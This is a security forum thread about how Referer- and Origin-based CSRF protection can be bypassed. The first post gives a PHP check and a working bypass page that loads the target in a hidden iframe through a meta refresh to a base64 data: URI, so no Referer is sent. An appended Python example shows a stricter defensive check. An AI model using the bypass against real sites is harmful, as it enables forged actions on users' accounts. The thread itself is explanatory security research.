
Thread: Bypassing CSRF protection that uses Referer and Source headers.

  1. #1
    fb1h2s (Security Researcher)
    Join Date: Jul 2010
    Location: India
    Posts: 616
    Blog Entries: 32

    Bypassing CSRF protection that uses Referer and Source headers.

    I have seen developers relying on the HTTP Referer header as a method of mitigating CSRF. One of the reasons is that it is proposed in the OWASP
    CSRF mitigation techniques, even though the article clearly says that trusting the referer is not the right idea to mitigate this issue:
    https://www.owasp.org/index.php/Cros...Referer_Header. I have also seen the Origin header being used to detect CSRF.

    Note: The HTTP Referer header is removed when a request is made from an https site to http, and vice versa.

    The following code checks whether the HTTP_REFERER header is present; if present, it checks whether the current host equals the referer host. If they are not the same, a CSRF alert is raised. Why not mandate the HTTP_REFERER header? Because the first GET request would never have a referer.


    PHP Code:
    if (isset($_SERVER['HTTP_REFERER'], $_SERVER['HTTP_HOST'])) {
        if (parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) != $_SERVER['HTTP_HOST']) {
            exit('Anti-CSRF mechanism!');
        }
    }
    So with the above I won't be able to directly iframe the page, since the frame request would carry the parent's Referer header.

    But this CSRF protection can be easily bypassed. The attacker only has to use any technique that lets him send a request without a Referer header.

    All we need to do is load the iframe from a data: URI. Now the iframe has no parent, so no such headers are added.

    <!DOCTYPE html>
    <html>
    <body>
    <iframe src="https://target-server.com" style="display:none;">
    </iframe>
    </body>
    </html>

    Base64-encode it and load it inside an http-equiv="Refresh" meta tag.

    data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5Pg0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg==


    <!DOCTYPE html>
    <html>
    <head>
    <meta http-equiv="Refresh" content="2;url=data:text/html;charset=utf-8;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxib2R5Pg0KPGlmcmFtZSBzcmM9Imh0dHBzOi8vdGFyZ2V0LXNlcnZlci5jb20iIHN0eWxlPSJkaXNwbGF5Om5vbmU7Ij4NCjwvaWZyYW1lPg0KPC9ib2R5Pg0KPC9odG1sPg==">
    </head>
    <body>
    </body>
    </html>

    And we would successfully bypass Referer- and Origin-based CSRF protections.

    Regards,

    Rahul Sasi
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Webapp Secninja
    Join Date: Aug 2012
    Location: Ranchi, Jharkhand
    Posts: 41
    Blog Entries: 2
    What if the web application rejects empty or blank referrers and X-FRAME-OPTIONS is set to DENY?
    Hacking Wacking Sab Moh Maya Hai

  3. #3
    fb1h2s (Security Researcher)
    Join Date: Jul 2010
    Location: India
    Posts: 616
    Blog Entries: 32
    You can only reject blank referrers in POST requests, not in GET requests, as the first request to the pages would obviously not have a referrer. Otherwise they will have to maintain the state in the session and recognize the first request.
    Hacking Is a Matter of Time Knowledge and Patience
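
    As an added example that is not the thread's code (nor the OWASP page's), here is a Python version of post #1's check beside a stricter variant applying post #3's rule: only safe methods may arrive without a Referer, and a state-changing request must carry an Origin or Referer whose host matches Host. Host names and header values are constructed samples.

```python
from urllib.parse import urlsplit

def host_of(url):
    """Lower-cased host[:port] of a URL, or None when it has none. 'Origin: null'
    (sent for opaque origins such as a data: URI document) has no host."""
    try:
        netloc = urlsplit(url).netloc
    except ValueError:
        return None
    return netloc.lower() or None

def lenient_check(headers):
    """Same logic as the PHP snippet in post #1: compare hosts only when a
    Referer is present; a request without one is waved through."""
    referer = headers.get("Referer")
    host = headers.get("Host")
    if referer is not None and host is not None:
        return host_of(referer) == host.lower()
    return True  # no Referer, no check: the gap the data: URI iframe exploits

SAFE_METHODS = ("GET", "HEAD", "OPTIONS")

def strict_check(method, headers):
    """Post #3's rule: a state-changing request must carry an Origin or Referer
    whose host matches Host; safe methods stay lenient because the first GET to
    a page legitimately has no Referer."""
    host = headers.get("Host", "").lower()
    if not host:
        return False
    if method.upper() in SAFE_METHODS:
        return True
    # Origin is checked first: browsers add it to cross-origin POSTs even when
    # the Referer is stripped or blank.
    for name in ("Origin", "Referer"):
        value = headers.get(name)
        if value:  # an empty header value counts as missing
            return host_of(value) == host
    return False  # neither header present: treat as cross-site

# Constructed sample requests (header dicts), not captured traffic.
SAME_SITE = {"Host": "target-server.com", "Origin": "https://target-server.com",
             "Referer": "https://target-server.com/settings"}
CROSS_SITE = {"Host": "target-server.com", "Referer": "https://attacker.example/page"}
NO_REFERER = {"Host": "target-server.com"}  # e.g. a frame loaded from a data: URI
NULL_ORIGIN = {"Host": "target-server.com", "Origin": "null"}
```

    Header checks of this kind are a secondary control; a per-session synchronizer token remains the primary CSRF defence.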
